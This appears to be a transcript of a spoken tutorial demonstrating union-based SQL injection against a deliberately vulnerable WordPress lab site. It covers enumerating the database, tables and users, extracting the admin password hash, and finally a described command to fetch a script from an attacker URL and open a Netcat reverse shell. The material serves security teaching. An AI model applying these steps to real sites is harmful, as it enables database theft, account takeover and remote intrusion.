Hi everyone. Today we're going to talk about SQL injection, and SQL injection is a way to basically allow you to alter SQL queries in a web application or a normal application, a GUI application or a server application. And it allows you to alter the SQL queries, basically allowing you to get information from the database by manipulating what the original programmer thought that you were supposed to be able to do. Now, this is one of the most prevalent exploits that you will find, especially on the web. And I'm going to show you how to do that today. So SQL injection can basically allow you to grab usernames, passwords, names, addresses, phone numbers, credit cards, and also allow you to inject malicious scripts into an application. So we're going to look at WordPress today, and WordPress, as you guys probably know, is a really popular blog software written in PHP, and it typically uses MySQL, although it could use other databases, but I'm not too sure. So today I'm going to show you some vulnerable code, and you can see a function right here. This is PHP, and in this function there's a parameter called category that's passed in by reference, and what happens down here is it gets inserted into this query. Now you're probably wondering what this query does, and let's not really worry about that too much. It's basically that we can see this category right here has no processing, no regular expressions, no way to validate that that input is correct. So a malicious user could change what category is, this variable category, to anything they want. So let's see how that works in WordPress in this exploit. So this is damn vulnerable blog, and it's basically set up so we can hack it. So here's categories, and we're just looking around here. You can see that there's not much here, but what we really want to focus on is these values right up here. So this is a get value. Cat is the parameter. One is the value of that parameter. So basically, from a black box perspective, we want to create some havoc and see if we get an error. So if we type a little tick mark right there, a little quote, a lot of times we'll get an error. And you can see at the top right here, there's a bunch of error warnings that we have errors in our SQL syntax. And whenever you see an error, especially related to SQL, that's immediately suspect that this application is vulnerable. So, I mean, we could look at it from this white box or black box perspective. Right here, it's just me screwing around, and I could find a vulnerability pretty easily just by altering the value of that get. So what we're doing right there is we're putting a little quote, a little tick mark, inside the get value. So that's category, basically, cat category. And right here we can see cat ID will equal category, and then you'll have a tick mark. Now what happens is that the MySQL says, hey, there's a tick mark here. And what PHP will try to do is it will try to escape that, and this causes all types of havoc on the actual query right here, and it will just basically fail. So let's kind of leverage this to our advantage, and let's enter like a little number right there, 99 or 999. And what we could do is we could find out how many columns are visible, or columns that we could use or that are actually processed in this query. So if you look right here, I kind of set this up so we could do this a little faster. There's only 10 minutes. So I kind of did this beforehand, and I'm going to walk you through what each query does. So we could take this selection right here, and let's put it up here, and we could say cat 999 plus union select 1. Okay, we still have an error. Now let's try union select 1 1. Now what we're doing here is we're trying to find out how many columns are in this particular table, and we keep going up until we find out there's no error. So we know that there's not 4 columns, we know there's not 3 columns, we know there's not 2, we know there's not 1. So let's try a fifth. Oh, okay, this one works. So now we're going to go back to the first column and change that value to, let's say, a 5. Okay, that had no difference on the output of this screen. Did you see any 5s here? No, there's no 5s. So let's try the second one. Okay, it looks like the second column is visible. We could see right here that 5 is actually used on this page right here for the archive for X category. Okay, so we know that the second column is visible and we have 5 columns in this table. So let's move on and gather something a little more interesting. So right now we're going to try to grab the user, the database, and the version of this particular database. So let's take our next query, and I'll explain this as well. And this one looks a little more complicated, but we'll see in a second it's not that bad. So the first one, we could do 1 or we could do null. We could pretty much make this anything we want. The second one's our visible column. So whatever we put in here is just like we had last time. So let's change that to 5 again, and we can see that our query hasn't changed. Now let's change our 5 to something that we can grab information out of the MySQL database. So let's change that to concat, which will take a bunch of values and put it all together into one string. Okay, so we're going to take user, which is a MySQL function, and the hex value for 0x3a, which is a colon, and then database, which is another MySQL function for the actual database, and we also want the version, so at version, and then just the next 3 columns we don't really care about right here because we want to get our values from the second column. So let's hit enter, and we could see that, oh, we have the user, which is root at localhost, which you never want to do. Do not use root on your SQL database. We could see that the database name is WordPress. Okay, cool. So we know our database name. Right now we're basically enumerating as much information we can about the target. Okay, so the next one is the version. We could see that it's using MySQL version 5.0.24a. Alright, cool. So we have some information about the database, the user, and the version of the MySQL server. Alright, so let's move on. Now we could find out which databases are actually in which databases are actually in MySQL right now. So what we're going to first want to do is we're going to take the hash value of this information schema.schemata. I probably not saying that right, but that's the hash value right there, and we're going to use that just because MySQL does some weird things and you really want to be sure that you grab the right value. So we're just going to change to hex for now, and if you want to know more information about why that it works, just come ask me after this. So you could take union all select, which, as you know, grabs 2 tables and puts them together, and then we're going to get the schema name right out of here, and then these other values we could replace with 1, but I'm just going to use null here, and we're going to take that from the information schema, that's schemata, where the schema name does not equal information schema.schemata. And we're going to limit 1 and the offset 0. Now we're going to use the limit and the offset because we're only going to be able to display one database at a time inside this field here. So we could change the offset to 1 to 2 to 3 in order to see the next one in the sequence. Okay, so let's try that. Okay, we could see that there's a database called Cipher here, and let's keep going up. Let's try to find the next one. We can see there's another database called E107. We can see there's another database called Joomla, and that's for the Joomla application. I really suggest you guys don't use that. And the third one is another version of Joomla. And the fourth one is the MySQL database, where we're getting our other information from. And that's another application. Okay, let's just skip to like 9 maybe. Okay, let's keep trying a little higher. Oh, there's a lot of databases here. Okay, so all these databases, we could actually kind of peek into them and grab information out of them. So if you have a bunch of databases stored on one MySQL server, pretty much from one SQL injection attack, we could basically own all the databases, get any information we want out of them. So just from one bug, everything's pretty much compromised. Okay, so you can see there's a lot of databases here. Okay, that's the end right there. So we could try maybe 14. We could try 13. Okay, WordPress is the last one in the list. And so we know that which databases we could attack. So basically the idea here now is we've kind of have a big picture of what we want to narrow down in. So when we have the database, then we want to enumerate the tables, and then we want to go and grab the columns, and then we want to grab the specific content. So that's basically what we're going to do, and we're going to move on to the table enumeration of the WordPress database. Okay, so WordPress in hex is this value. So what we're going to do is we're going to grab the table name here, and from the information schema tables, where the table schema does not equal WordPress. Okay, so let's try this one, and we could see that the first one right here, the first table in WordPress is called WP categories. Okay, that doesn't sound too interesting. Let's keep going until we find something more juicy. Okay. See that 3 WordPress options. Okay. These don't sound too interesting. So, this is an open source program, so we could do something a little bit easier. Let's just look at what kind of database we have here. What's in it? Okay. And let's look at WordPress. This is PHPMyAdmin. It allows you to basically look in a database and control it through the web. WP users. That's the table we want right there for sure, and we're definitely going to go after the login and password. So let's see, 0, 1, 2, 3, 4, 5, 6, 7, 8. Let's see what 8 grabs us. Oh, we were just there. Okay, WP users, great. Okay, so let's go after WP users. And the reason we want to do each one at a time without looking at the source code is sometimes we don't have the source code. A lot of applications on the internet are custom, so this is kind of more of a white box test, but I'm kind of giving you guys the idea of how to go about this given a black box scenario. So here we go. That's the column enumeration. And let's find out how many rows are in this table. So we're going to use our little count function right here, and we're going to put that all together, and we're going to grab that from WP users, what we're in right now. So it's pretty straightforward. And just so you guys see again, concat count user login. Okay, because we got user login from right here, but we could have just enumerated them regardless. I'm just skipping ahead a little bit. Okay, we can see that there is one user, and I could pretty much guess that the first user typically is the admin user. So let's go in and see what we could get from that admin user. Now our next query, you're going to see that we have a concatenation of the user login and the user pass separated by a colon, 0x3a, from the WP users table, and we want to limit that one offset 0. It's the first one. Now this isn't particularly necessary in this query, but if we wanted to grab all of the usernames and passwords, we would do that. So we could see that the admin username is here, admin, and we could see that the hash is right here. So the next step what we take is we want to get this hash into actual password form. So you could take pretty typical hashes, and we could see that right here is just Tor. So that's the password for the admin user, and now we would be able to log in. Okay, so yeah, basically that's how you do it, and you'd basically proceed to log in as an admin, and then you look for other ways to gain control of that system. Now, one of the other ways to gain control of that system is to use something called remote file inclusion, or just local file inclusion if you want to grab more information from the system. You could do all sorts of techniques in order to do remote command execution, otherwise known as RCE. And by that I mean taking a few lines of PHP and putting that in an existing line of PHP, and then having something like this turn into command ls or command cd temp wget some evil url.com my crazy script.txt. Okay, so you could do something like that, or .perl, and then you could basically say perl my crazy, and what that could do if you wanted to program something like that is it would make a remote callback connection to your own host. So in effect, it would be bypassing the firewall to connect to your computer, passing you a shell where you're listening with Netcat. Now that sounds all crazy and everything, but it's really simple. And if you have questions about how to do that, or if you want me to demonstrate it, just let me know. But for now, I think I've covered SQL injection pretty well. It's kind of an intro, so if you want to know more advanced SQL injection attacks, just let me know. But for now, it's good. Thanks for listening.